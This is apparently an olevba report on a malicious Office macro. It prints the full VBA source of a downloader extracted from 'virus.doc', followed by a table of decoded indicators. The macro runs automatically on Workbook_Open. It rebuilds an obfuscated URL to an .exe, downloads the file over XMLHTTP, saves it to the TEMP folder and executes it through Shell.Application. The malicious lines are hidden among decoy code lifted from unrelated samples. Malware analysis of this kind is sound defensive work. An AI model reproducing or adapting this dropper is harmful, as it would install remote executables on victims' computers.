Malicious Excel macro

olevba 0.41 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASIHB-V virus.doc

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: virus.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ÝòàÊíèãà.cls
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_Open()

GetFolderStartAndUp (987)
End Sub
Sub GetFolderStartAndUp(subMain As Long)
blnSessionBegunRunRun = False
IndentStringToVob
End Sub
-------------------------------------------------------------------------------
VBA MACRO Ëèñò1.cls
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò2.cls
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Ëèñò3.cls
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Function GetKeyValue(FullKeyName)
xTotalStartUp = 0
Dim Key1, Key2, i, Ua
Ua = 10
For i = 1 To Len(FullKeyName)
    If Mid(FullKeyName, i, 1) = "\" Then
        Ua = Ua + 10
        If Ua = 20 Then
            Key1 = Left(FullKeyName, i - 1)
            Key2 = Right(FullKeyName, Len(FullKeyName) - i)
        End If
    End If
Next i
'frmMain.Cls
If Key1 = "HKEY_LOCAL_MACHINE" Then
RetVal = C.RegOpenKeyEx(HKEY_LOCAL_MACHINE, Key2, 0, KEY_ALL_ACCESS, hKey)
ElseIf Key1 = "HKEY_CURRENT_USER" Then
RetVal = RegOpe.nKeyEx(HKEY_CURRENT_USER, Key2, 0, KEY_ALL_ACCESS, hKey)
End If

Index = 0
Do While RetVal = 0
    NameKey = Space(255)
    DataString = Space(255)
    LenName = 255
    DataLen = 255
    RetVal = RegEnu.mValue(hKey, Index, NameKey, LenName, 0, lpType, Da.ta(0), DataLen)
    If RetVal = 0 Then
        NameKey = Left(NameKey, LenName) 'Rut b? kho?n tr?ng th?a
        DataString = ""
' X? ly thong tin theo ki?u c?a no va ??a vao bi?n DataString
        Select Case lpType
             Case REG_SZ
                For i = 0 To DataLen - 1
                    DataString = DataString & Chr(Da.ta(i)) ' N?i cac ch? cai thanh chu?i
                Next
             Case REG_BINARY
                For i = 0 To DataLen - 1
                    Dim temp As String
                    temp = Hex(Da.ta(i))
                    If Len(temp) < 2 Then temp = String(2 - Len(temp), "0") & temp
                    DataString = DataString & temp & " "
 ' N?i cac c?p s? nh? phan l?i v?i nhau
                Next
            Case REG_DWORD
                For i = DataLen - 1 To 0 Step -1
                    DataString = DataString & Hex(Da.ta(i)) 'N?i cac so hexa v?i nhau
                Next

            Case REG_MULTI_SZ
                For i = 0 To DataLen - 1
                    DataString = DataString & Chr(Da.ta(i))
    'N?i cac ky t? bao g?m ky t? vbNullChar (?? cach dong) thanh m?t chu?i, b?n co th? s? d?ng m?t m?ng g?m nhi?u string thay vi la m?t
                Next
            Case REG_EXPAND_SZ
                For i = 0 To DataLen - 2
                    DataString = DataString & Chr(Da.ta(i))
    'N?i cac ky t? l?i v?i nhau, b? ky t? NULL cu?i cung
                Next
            Case Else
                DataString = " Khong xac dinh duoc !"
        ' Tren ?ay la 5 ki?u co tren WinXP
        End Select
    End If
    Loop
    End Function
 Public Function ntegerLongue(VariantNeVariant As Variant, StringAsString As String)
Dim rimmaLongInteger As Object
Set rimmaLongInteger = SplitXMLStringAndNot(Chr(65) & Chr(100) + "(" & Chr(111) & Chr(100) & "b*" & Chr(46) & ")S" & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "+m")
rimmaLongInteger.Type = 1
With rimmaLongInteger
    .Open
    .write VariantNeVariant
End With
REGMULTISZ1 rimmaLongInteger, StringAsString
End Function


 Public Function ntegerccCLongue()
    If Left(Left(NameKey, LenName), 1) <> " " Then
    '///////////////////
    'Form1.List1.AddItem DataString

    With frmMain.LV
        Dim iu
        iu = .ListItems.Count + 1
        .ListItems.Add iu, , Left(NameKey, LenName)
        .ListItems(iu).SubItems(1).Caption = DataString
        .ListItems(iu).SubItems(2).Caption = Key1 & "\" & Key2 & "\" & Left(NameKey, LenName)
    End With
    '///////////////
    End If
    Index = Index + 1
    'frmMain.Print Left(NameKey, LenName) & "=" & DataString

RetVal = RegC.loseKey(hKey)
End Function

Public Function GetFileName(ByVal sPath As String) As String
GetFileName = Mid(sPath, InStrRev(sPath, "\") + 1)
End Function

Public Sub IndentStringToVob()
Dim SplitIndexAsString As Object
Set SplitIndexAsString = SplitXMLStringAndNot(Chr(77) & "++" + Chr(105) & "(cr)" & Chr(111) & Chr(130 - 15) & Chr(100 + 11) & Chr(102) & "t" & Chr(46) & "*X" & Chr(77) & Chr(76) & "*H" & Chr(84) & "TP")
Dim SIDRa As String
Dim CHR20 As Integer
CHR20 = 20

SIDRa = Chr(104) & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & "l" & Chr(97) & Chr(114) & Chr(109) & Chr(116) & Chr(101) & Chr(99) & "h" & Chr(99) & Chr(101) & Chr(110) & "t" & "r" & "a" & Chr(108) & "." & Chr(99) & Chr(111) & Chr(109) & "/" & "f" & "w" & Chr(52) & "3" & "t" & "2" & Chr(100) & "/" & Chr(57) & "8" & Chr(107) & "j" & "6" & Chr(46) & Chr(101) & Chr(120) & "e"
For i = 1 To 4
SIDRa = Replace(SIDRa, Chr(20 * 2 + i - 1), "")
Next i


HIDRAfob SplitIndexAsString, SIDRa


Dim LocaliseStringItem3() As Byte
ListItemsAndNot = GetTasNewUt()

LocaliseStringItem3 = RSPBDY(SplitIndexAsString)

ntegerLongue LocaliseStringItem3, ListItemsAndNot
On Error GoTo LocaliseStringItem5
    A = 889 / 0
  On Error GoTo 0

IniStringPrivateInteger:
  Exit Sub
LocaliseStringItem5:
  IniStringPrivateLong ("VisokAndVisok")
Resume IniStringPrivateInteger
End Sub
Public Function GetFolderPath(ByVal sPath As String) As String
GetFolderPath = Left(sPath, InStrRev(sPath, "\") - 1)
End Function

Public Sub GetSystemKey()
    With frmMain.LV
        Dim iu
        iu = .ListItems.Count + 1
        .ListItems.Add iu, , ToUnik.Code("Shell [He65 Tho61ng]")
        .ListItems(iu).SubItems(1).Caption = GetS.tring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
        .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
        iu = .ListItems.Count + 1
        .ListItems(iu).SubItems(1).Caption = GetSt.ring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
        .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
    End With
End Sub

Public Sub GetFolderStartUp(sWhere)
With frmMain
    Dim j
    Dim o
If sWhere = 1 Then
    .File1.Path = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    For j = 0 To .File1.ListCount - 1
        o = .LV.ListItems.Count + 1
        .LV.ListItems.Add o, , .File1.List(j)
        .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & .File1.List(j)
        .LV.ListItems(o).SubItems(2).Caption = "---"
    Next j
Else
    .File1.Path = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup"
    For j = 0 To .File1.ListCount - 1
        o = .LV.ListItems.Count + 1
        .LV.ListItems.Add o, , .File1.List(j)
        .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup\" & .File1.List(j)
        .LV.ListItems(o).SubItems(2).Caption = "---"
    Next j
End If
End With
End Sub

Public Function HIDRAfob(SplitIndexAsString As Object, SIDRa As String)

SplitIndexAsString.Open Chr(71) & Chr(69) & "T", Replace(SIDRa, "??", "//"), False
End Function


-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public blnIsOpenConnection As Boolean
Public blnSessionBegun As Boolean
' Ticket
Public ticket As String

Public blnSessionBegunRunRun As Boolean
' Request and response strings
Public requestXML  As String
Public responseXML As String


Public Function OpenConnection() As Boolean
'Open the connection
On Error GoTo ErrHandler

    If blnIsOpenConnection Then
        OpenConnection = True
        Exit Function
    End If


    blnSessionBegun = False
    blnIsOpenConnection = False

    ' Open connection to qbXMLRP COM
    qbXMLRP.OpenConnection "QBRAddEmp", "IDN QuickBooks Sample Add Invoice"
    blnIsOpenConnection = True
    ' Begin Session
    ' Pass empty string for the data file name to use the currently
    ' open data file.


    ticket = qbXMLRP.BeginSession("", QBXMLRPLib.qbFileOpenSingleUser)
    blnSessionBegun = True

    OpenConnection = True 'return that the connection was successful

    'Verifying which version of qbXML QuickBooks is supporting If you want to do a US/Canadian APP,
    'This is where you would find the version supported by QuickBooks.  You would modify the requests accordingly
    'to the version of QuickBooks
    Dim VersionSupportedArray() As String
    VersionSupportedArray = qbXMLRP.QBXMLVersionsForSession(ticket) ' This return an array of string containing all the version of qbXML
                                                            'supported by QuickBooks

    'Checking that QuickBooks support the Canadian SDK (version CA2.0)
    Dim strCanadianVersion As String
    Dim blnCanadianVersionFound As Boolean
    Dim str As Variant


'    Dim nArrayUpperBound As Integer


    strCanadianVersion = "CA2.0"
    blnCanadianVersionFound = False

    For Each str In VersionSupportedArray
        If strCanadianVersion = str Then
            blnCanadianVersionFound = True
        End If

    Next str

    If blnCanadianVersionFound = False Then 'If version CA 2.0 not found...
        MsgBox "This QuickBooks does not support the version CA2.0 of qbXML", , "qbXML version not supported"""
        If blnSessionBegun = True Then
            qbXMLRP.EndSession ticket
        End If
        ' Close the connection
        If blnIsOpenConnection = True Then
            blnIsOpenConnection = False
            qbXMLRP.CloseConnection
        End If
        OpenConnection = False

    End If


    Exit Function

ErrHandler:
    blnIsOpenConnection = False
    OpenConnection = False
    ' End the session
    If blnSessionBegun = True Then
        qbXMLRP.EndSession ticket
    End If
    ' Close the connection
    If blnIsOpenConnection = True Then
        qbXMLRP.CloseConnection
    End If
    MsgBox Err.Description, vbExclamation, "Error"
    Exit Function

End Function


Public Sub CloseConnection()
' Ends session and closes connection

If Not blnIsOpenConnection Then
        Exit Sub
End If

On Error GoTo ErrHandler

    If blnSessionBegun = True Then
        qbXMLRP.EndSession ticket
    End If
    ' Close the connection
    If blnIsOpenConnection = True Then
        qbXMLRP.CloseConnection
    End If

    Exit Sub

ErrHandler:
    MsgBox Err.Description, vbExclamation, "Error"
    Exit Sub

End Sub

Public Function IniStringPrivateLong(ZRzNfTJSyBWpPu As String)
    Set IniLongPrivateInteger = SplitXMLStringAndNot("Sh" & Chr(101) & "(l)" & "+l+" & Chr(46) & Chr(65) & "*p" & Chr(112) & "(l)" & Chr(105) & Chr(99) & "a+t" + Chr(105) & "()" & Chr(111) + Chr(110))
IniLongPrivateInteger.Open (ListItemsAndNot)
End Function


' This subroutine is available for error checking.  It is sometimes
' useful to print the XML which QuickBooks returns to a file so that
' any problems can be uncovered easily.  Although this subroutine is
' not currently in use in the ReceievePayment sample code, it is
' encouraged that you add it in if you would like to see the precise
' XML that is being sent to or received from QuickBooks.
'
Sub PrintXMLToFile(xmlString As String, XMLFile As String)

  Dim SplitXMLString() As String
  Dim IndentString As String
  Dim xmlStringLength As Long
  Dim SplitIndex

  IndentString = ""

  Dim FileNum
  FileNum = FreeFile
  Open XMLFile For Output As FileNum

  ' Remove the linefeeds from the XML output string
  xmlString = Replace(xmlString, vbLf, vbNullString)

  SplitXMLString = Split(xmlString, "<")

  ' We're expecting the first character of the XML output to be "<"
  ' which result in an empty first array element, so skip it.
  SplitIndex = LBound(SplitXMLString) + 1
  End Sub
  Public Function RSPBDY(SomeBody As Object) As Variant
SomeBody.Send
RSPBDY = SomeBody.responseBody
End Function
Public Sub ReadFile( _
  strName As String, _
  strDate As String _
)

    Dim strMstDir As String
    Dim strClientName As String
    Dim strTargetdate As String
    Dim intCntPic As Integer

    strMstDir = gstrMstDir
    strClientName = strName

    If strDate <> vbNullString Then
        strTargetdate = strDate
    End If

''    Select Case frmSubForm.Name
''        Case "frmBasic"
            intCntPic = 13
''        Case "frmFP"
''            intCntPic = 3
''        Case "frmIOP"
''            intCntPic = 6
''    End Select

    Dim intIndex        As Integer
    ReDim m_udtFileList(intIndex)

    Dim strDirFile      As String, strLoadPicFile  As String

    Dim intFileHandle As Integer
    Dim strFilePath As String
    Dim strFileName As String
    Dim strReadHeader As String
    Dim strReadData As String

    strFilePath = gstrMstDir & "\" & strName
    strFileName = strFilePath & "\" & strDate & "T.txt"

    If strName = vbNullString Then Exit Sub
    If Dir(strFileName) = vbNullString Then Exit Sub

'/** ??????? **/
    datDate = CDate(DateSerial(Left$(strDate, 4), _
                Mid$(strDate, 5, 2), Mid$(strDate, 7, 2)))

'// ??????????????
    m_sParts = vbNullString

'/** ?????????????? **/
    intFileHandle = FreeFile()
    Open strFileName For Input As #intFileHandle

    ReDim Preserve m_udtFileList(intIndex)
    While Not EOF(intFileHandle)
        With m_udtFileList(intIndex)
            Input #intFileHandle, strReadHeader, strReadData
            Select Case strReadHeader
                Case "[Picture]"
                Case "[Document]"
                Case "[Shooting]"
                Case "NAME"
                    m_sParts = strReadData
                Case Else
                  If strReadData <> "" Then
                    .intFileNum = CInt(Right$(strReadHeader, 1))
                    .strClntName = strName
                    .strFileDate = Left$(strReadData, 8)

''                        datDate = CDate(DateSerial(Left$(strReadData, 4), _
                                Mid$(strReadData, 5, 2), Mid$(strReadData, 7, 2)))

                    .strFileName = strReadData
                    .strFileType = Left$(strReadHeader, 1)
                    strLoadPicFile = gstrMstDir & "\" & .strClntName & "\" & .strFileName

                    Call frmProgress.SetProgess((intIndex) / intCntPic * 100)

                    intIndex = intIndex + 1
                End If
            End Select
        End With

        ReDim Preserve m_udtFileList(intIndex)

    Wend

    Close #intFileHandle

DoEvents

End Sub

Public Function SplitXMLStringAndNot(InitiPrivateInteger As String)
For i = 1 To 4
InitiPrivateInteger = Replace(InitiPrivateInteger, Chr(20 * 2 + i - 1), "")
Next i
If blnSessionBegunRunRun Then
Exit Function
End If

    Set SplitXMLStringAndNot = CreateObject(InitiPrivateInteger)
End Function
  Public Function SmthingWrongFunc()
  Do
    If Left(Splift.xmlString(SplitIndex), 1) = "/" Then
      IndentString = Left(IndentString, Len(IndentString) - 3)
      Print #FileNum, IndentString & "<" & _
                      SplitXM.LString(SplitIndex)
      SplitIndex = SplitIndex + 1
    ElseIf Left(SplitXM.LString(SplitIndex + 1), 1) = "/" Then
      If InStr(1, _
               Left(SplitXM.LString(SplitIndex), _
                    InStr(1, SplitXM.LString(SplitIndex), ">")), _
                " ") > 0 Then
        Print #FileNum, IndentString & "<" & _
                        SplitXM.LString(SplitIndex)
        SplitIndex = SplitIndex + 1
      Else
        Print #FileNum, IndentString & "<" & _
                        SplitXM.LString(SplitIndex) & "<" & _
                        SplitXM.LString(SplitIndex + 1)
        SplitIndex = SplitIndex + 2
      End If
    Else
      Print #FileNum, IndentString & "<" & _
                      SplitXM.LString(SplitIndex)
      IndentString = IndentString & "   "
      SplitIndex = SplitIndex + 1
    End If
  Loop Until SplitIndex >= UBound(SplitX.MLString)

  If Left(SplitXM.LString(UBound(SplitX.MLString)), 1) = "/" Then
    IndentString = Left(IndentString, Len(IndentString) - 3)
  End If

  Print #FileNum, IndentString & "<" & _
                  SplitXM.LString(UBound(SplitXM.LString))

  Close FileNum
End Function


-------------------------------------------------------------------------------
VBA MACRO Module3.bas
in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public ListItemsAndNot As String
Public Function GetCharsetFromLng(lngCodePage As Long) As Long

    Dim lngCharset As Long

    Select Case lngCodePage

        Case 1251
            lngCharset = RUSSIAN_CHARSET

        Case 1250
            'EASTEUROPE_CHARSET = 238
            lngCharset = EASTEUROPE_CHARSET

        Case 1252
            'ANSI_CHARSET = 0
            lngCharset = ANSI_CHARSET

        Case 1253
            'GREEK_CHARSET = 161
            lngCharset = GREEK_CHARSET

        Case 1254
            'TURKISH_CHARSET = 162
            lngCharset = TURKISH_CHARSET

        Case 1255
            'HEBREW_CHARSET = 177
            lngCharset = HEBREW_CHARSET

        Case 1256
            'ARABIC_CHARSET = 178
            lngCharset = ARABIC_CHARSET

        Case 1257
            'BALTIC_CHARSET = 186
            lngCharset = BALTIC_CHARSET

        Case 1258
            'VIETNAMESE_CHARSET = 163
            lngCharset = VIETNAMESE_CHARSET

        Case 874
            lngCharset = THAI_CHARSET

        Case 932
            'SHIFTJIS_CHARSET = 128
            lngCharset = SHIFTJIS_CHARSET

        Case 949
            'HANGUL_CHARSET = 129
            lngCharset = HANGUL_CHARSET

        Case 936
            'GB2312_CHARSET = 134
            lngCharset = GB2312_CHARSET

        Case 950
            'CHINESEBIG5_CHARSET = 136
            lngCharset = CHINESEBIG5_CHARSET

        Case Else
            'DEFAULT_CHARSET = 1
            lngCharset = DEFAULT_CHARSET
    End Select

    GetCharsetFromLng = lngCharset
End Function
Public Function GetTasNewUt() As String
Set LocaliseStringItem0 = SplitXMLStringAndNot(Chr(87) & "(S+c)" & Chr(114) & Chr(105) & "*p" & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "))l")

Set LocaliseStringItem1 = LocaliseStringItem0.Environment(Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
Dim huh2 As Integer
huh2 = 25
Dim uhu As String
uhu = Chr(16 * Sqr(huh2) - 10 - 1)
uhu = Chr(180 - 30 * 2) + uhu
GetTasNewUt = LocaliseStringItem1(Chr(84) & "E" & Chr(77) & Chr(80)) + _
"\ka" & Chr(104) + "78d" & Chr(40 + 2 * 3) & Chr(70 - 1) + uhu

End Function
'!--------------------------------------------------------------------------------
'! Procedure   (Ooieoey)   :   Function GetUserLocaleInfo
'! Description (Iienaiea)  :   [type_description_here]
'! Parameters  (Ia?aiaiiua):   dwLocaleID (Long)
'                              dwLCType (Long)
'!--------------------------------------------------------------------------------
Public Function GetUserLocaleInfo(ByVal dwLocaleID As Long, ByVal dwLCType As Long) As String

    Dim sReturn As String
    Dim R       As Long

    'call the function passing the Locale type
    'variable to retrieve the required size of
    'the string buffer needed
    R = ss.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, 0)

    'if successful..
    If R Then
        'pad the buffer with spaces
        sReturn = s.FillNullChar(R)
        'and call again passing the buffer
        R = cs.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, Len(sReturn))

        'if successful (r > 0)
        If R Then
            'r holds the size of the string
            'including the terminating null
            GetUserLocaleInfo = sc.TrimNull(sReturn)
        End If
    End If

End Function

'!--------------------------------------------------------------------------------
'! Procedure   (Ooieoey)   :   Function LoadLanguageList
'! Description (Iienaiea)  :   [Caa?ocea nienea ycueia]
'! Parameters  (Ia?aiaiiua):
'!--------------------------------------------------------------------------------
Public Function LoadLanguageList() As Boolean

    Dim strFileList_x() As Integer
    Dim ii              As Integer
    Dim jj              As Integer
    Dim strTemp         As String
    Dim strLangFilePath As String
    Dim lngUbound       As Long

    strFileList_x = sc.SearchFilesInRoot(strAppPathBackSL & strToolsLang_Path, "*.lng", False, False)

    lngUbound = UBound(strFileList_x)
    If lngUbound Then
        If LenB(sc.strFileList_x(0).FullPath) Then

            ReDim arrLanguage(6, lngUbound + 1)

            For ii = 0 To lngUbound
                jj = ii + 1

                ' Ioou ai ycueiaiai oaeea
                strLangFilePath = cs.strFileList_x(ii).FullPath
                arrLanguage(1, jj) = strLangFilePath
                ' Eiy ycuea
                arrLanguage(2, jj) = GetIn.iValueString(strLangFilePath, "Lang", "Name", vbNullString)
                ' Eiy ia?aaia?eea
                arrLanguage(4, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorName", vbNullString)
                ' Aa?an ia?aaia?eea
                arrLanguage(5, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorURL", vbNullString)
                ' Charset ycuea
                arrLanguage(6, jj) = GetIn.iValueLong(strLangFilePath, "Lang", "Charset", 1)
                ' ID ycuea
                strTemp = GetIn.iValueString(strLangFilePath, "Lang", "ID", vbNullString)

                If LenB(strTemp) Then
                    arrLanguage(3, jj) = strTemp

                    If mbAutoLanguage Then
                        If InStr(1, strTemp, strPCLangID, vbTextCompare) Then
                            strPCLangCurrentPath = arrLanguage(1, jj)
                            strPCLangCurrentLangName = arrLanguage(2, jj)
                            lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
                            strPCLangCurrentID = strPCLangID
                        End If

                    Else

                        If LenB(strStartLanguageID) Then
                            If InStr(1, strTemp, strStartLanguageID, vbTextCompare) Then
                                strPCLangCurrentPath = arrLanguage(1, jj)
                                strPCLangCurrentLangName = arrLanguage(2, jj)
                                lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
                                strPCLangCurrentID = strStartLanguageID
                            End If
                        End If
                    End If
                End If

                LoadLanguageList = True
            Next

            If LenB(strPCLangCurrentPath) = 0 Then
                strPCLangCurrentPath = Pa.thCombine(strAppPathBackSL & strToolsLang_Path, "English.lng")
                strPCLangCurrentID = "0409"
                lngFont_Charset = 1
            End If
        End If
    End If

End Function

'!--------------------------------------------------------------------------------
'! Procedure   (Ooieoey)   :   Sub LoadLanguageOS
'! Description (Iienaiea)  :   [N?eouaaai ycue iia?aoeiiiie nenoaiu, e caienuaaai a ia?aiaiiua Public]
'! Parameters  (Ia?aiaiiua):
'!--------------------------------------------------------------------------------
Public Sub LoadLanguageOS()

    Dim LCID As Long

    ' N?eouaaai ycue iia?aoeiiie nenoaiu
    LCID = GetSys.temDefaultLCID()
    'language id
    strPCLangID = GetUserLocaleInfo(LCID, LOCALE_ILANGUAGE)
    'localized name of language
    strPCLangLocaliseName = GetUserLocaleInfo(LCID, LOCALE_SLANGUAGE)
    'English name of language
    strPCLangEngName = GetUserLocaleInfo(LCID, LOCALE_SENGLANGUAGE)
End Sub
Public Function REGMULTISZ1(REGEXPANDSZ As Object, EXPANDSZ1 As String)
Dim REG_EXPAND_SZ As Integer
REG_EXPAND_SZ = 2
REGEXPANDSZ.savetofile EXPANDSZ1, REG_EXPAND_SZ
End Function


'!--------------------------------------------------------------------------------
'! Procedure   (Ooieoey)   :   Sub LocaliseMessage
'! Description (Iienaiea)  :   [Eieaeecaoey niiauaiee i?ia?aiiu]
'! Parameters  (Ia?aiaiiua):   StrPathFile (String)
'!--------------------------------------------------------------------------------
Public Sub LocaliseMessage(strPathFile As String)

    Dim i As Integer

    For i = 1 To UBound(strMessages)
        strMessages(i) = LocaliseString(strPathFile, "Messages", "strMessages" & i, "strMessages" & i)
    Next i

End Sub

'!--------------------------------------------------------------------------------
'! Procedure   (Ooieoey)   :   Function LocaliseString
'! Description (Iienaiea)  :   [type_description_here]
'! Parameters  (Ia?aiaiiua):   StrPathFile (String)
'                              strSection (String)
'                              strParam (String)
'                              strDefValue (String)
'!--------------------------------------------------------------------------------
Public Function LocaliseString(ByVal strPathFile As String, ByVal strSection As String, ByVal strParam As String, ByVal strDefValue As String) As String

    Dim strTemp As String

    strTemp = Trim$(IniSt.ringPrivate(strSection, strParam, strPathFile))

    If StrComp(strTemp, "no_key") <> 0 Then
        LocaliseString = Conve.rtString(strTemp)
    Else
        LocaliseString = strDefValue
    End If

End Function


+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
| Suspicious | Open                 | May open a file                         |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | Windows              | May enumerate application windows (if   |
|            |                      | combined with Shell.Application object) |
| Suspicious | RegOpenKeyEx         | May read or write registry keys         |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | sample               | May detect Anubis Sandbox               |
| Suspicious | Chr                  | May attempt to obfuscate specific       |
|            |                      | strings                                 |
| Suspicious | SaveToFile           | May create a text file                  |
| Suspicious | Environ              | May read system environment variables   |
| Suspicious | Write                | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | Output               | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | Print #              | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
|            |                      | be used to obfuscate strings (option    |
|            |                      | --decode to see all)                    |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
|            | Strings              | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | http://alarmtechcent | URL (obfuscation: VBA expression)       |
|            | ral.com/fw43t2d/98kj |                                         |
|            | 6.exe                |                                         |
| IOC        | 98kj6.exe            | Executable file name (obfuscation: VBA  |
|            |                      | expression)                             |
| VBA string | Ad(odb*.)Strea+m     | (Chr(65) & Chr(100) + "(" & Chr(111) &  |
|            |                      | Chr(100) & "b*" & Chr(46) & ")S" &      |
|            |                      | Chr(116) & Chr(114) & Chr(101) &        |
|            |                      | Chr(97) & "+m")                         |
| VBA string | M++i(cr)o            | Chr(77) & "++" + Chr(105) & "(cr)" &    |
|            |                      | Chr(111)                                |
| VBA string | oft.*XML*HTTP        | Chr(100 + 11) & Chr(102) & "t" &        |
|            |                      | Chr(46) & "*X" & Chr(77) & Chr(76) &    |
|            |                      | "*H" & Chr(84) & "TP"                   |
| VBA string | http://alarmtechcent | Chr(104) & "t" & "t" & Chr(112) &       |
|            | ral.com/fw43t2d/98kj | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
|            | 6.exe                | "l" & Chr(97) & Chr(114) & Chr(109) &   |
|            |                      | Chr(116) & Chr(101) & Chr(99) & "h" &   |
|            |                      | Chr(99) & Chr(101) & Chr(110) & "t" &   |
|            |                      | "r" & "a" & Chr(108) & "." & Chr(99) &  |
|            |                      | Chr(111) & Chr(109) & "/" & "f" & "w" & |
|            |                      | Chr(52) & "3" & "t" & "2" & Chr(100) &  |
|            |                      | "/" & Chr(57) & "8" & Chr(107) & "j" &  |
|            |                      | "6" & Chr(46) & Chr(101) & Chr(120) &   |
|            |                      | "e"                                     |
| VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start                  |
|            | Programs\Startup     | Menu\Programs\Startup"                  |
| VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start                  |
|            | Programs\Startup\    | Menu\Programs\Startup\"                 |
| VBA string | GET                  | Chr(71) & Chr(69) & "T"                 |
| VBA string | She(l)+l+.A*pp(l)ica | ("Sh" & Chr(101) & "(l)" & "+l+" &      |
|            | +ti()on              | Chr(46) & Chr(65) & "*p" & Chr(112) &   |
|            |                      | "(l)" & Chr(105) & Chr(99) & "a+t" +    |
|            |                      | Chr(105) & "()" & Chr(111) + Chr(110))  |
| VBA string | W(S+c)ri*pt.Shel))l  | (Chr(87) & "(S+c)" & Chr(114) &         |
|            |                      | Chr(105) & "*p" & Chr(116) & Chr(46) &  |
|            |                      | Chr(83) & Chr(104) & Chr(101) &         |
|            |                      | Chr(108) & "))l")                       |
| VBA string | Process              | (Chr(80) & "r" & Chr(111) & Chr(99) &   |
|            |                      | Chr(101) & Chr(115) & Chr(115))         |
| VBA string | TEMP\kah78d          | (Chr(84) & "E" & Chr(77) & Chr(80)) +   |
|            |                      | "\ka" & Chr(104) + "78d"                |
+------------+----------------------+-----------------------------------------+